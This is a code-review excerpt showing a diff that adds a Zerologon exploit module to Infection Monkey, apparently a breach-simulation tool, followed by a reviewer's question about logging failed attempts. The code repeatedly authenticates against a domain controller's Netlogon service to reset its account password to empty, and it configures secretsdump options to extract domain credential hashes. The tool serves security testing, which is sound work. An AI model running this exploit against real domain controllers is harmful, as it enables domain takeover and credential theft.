monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+    sys.stdout = _orig_stdout
+    _new_stdout.seek(0)
+    return _new_stdout.read()
+
+
+class ZerologonExploiter(HostExploiter):
+    _TARGET_OS_TYPE = ['windows']
+    _EXPLOITED_SERVICE = 'Netlogon'
+    EXPLOIT_TYPE = ExploitType.VULNERABILITY
+    SHOULD_ADD_MACHINE_TO_EXPLOITED_SET = False
+    MAX_ATTEMPTS = 2000
+    OPTIONS_FOR_SECRETSDUMP =\
+        {
+            'aes_key': None,
+            'bootkey': None,
+            'can_process_SAM_LSA': True,
+            'dc_ip': None,
+            'debug': False,
+            'exec_method': 'smbexec',
+            'hashes': None,
+            'history': False,
+            'is_remote': True,
+            'just_dc': True,    # becomes False in a copy in get_original_pwd_nthash()
+            'just_dc_ntlm': False,
+            'just_dc_user': None,
+            'k': False,
+            'keytab': None,
+            'no_lmhash': True,
+            'no_pass': True,
+            'ntds': None,
+            'outputfile': None,
+            'pwd_last_set': False,
+            'resumefile': None,
+            'sam': None,
+            'security': None,
+            'system': None,  # sam, security, and system are assigned in a copy in get_original_pwd_nthash()
+            'target': '',
+            'target_ip': '',  # target and target_ip are assigned in a copy in get_admin_pwd_hashes()
+            'ts': False,
+            'use_vss': False,
+            'user_status': False
+        }
+
+    def __init__(self, host):
+        super().__init__(host)
+        self.vulnerable_port = None
+        self.zerologon_finger = ZerologonFinger()
+        self.exploit_info['credentials'] = {}
+
+    def _exploit_host(self):
+        self.dc_ip, self.dc_name, self.dc_handle = self.zerologon_finger._get_dc_details(self.host)
+
+        if self.is_exploitable():
+            LOG.info("Target vulnerable, changing account password to empty string.")
+
+            # Connect to the DC's Netlogon service.
+            rpc_con = self.connect_to_dc()
+
+            # Start exploiting attempts.
+            # Max attempts = 2000. Expected average number of attempts needed: 256.
+            LOG.debug("Attempting exploit.")
+            result = None
+            for _ in range(0, self.MAX_ATTEMPTS):
+                try:
+                    result = self.attempt_exploit(rpc_con)
+                except nrpc.DCERPCSessionError as e:
+                    # Failure should be due to a STATUS_ACCESS_DENIED error.
+                    # Otherwise, the attack is probably not working.
+                    if e.get_error_code() != 0xc0000022:
+                        LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+                except BaseException as e:
+                    LOG.info(f"Unexpected error: {e}")
+
+                if result is not None:
+                    break
+
+                self.report_login_attempt(result=False,
+                                          user=self.dc_name)
```

Comment:
Do we really want to flood our database with these attempts? What value does knowing this bring?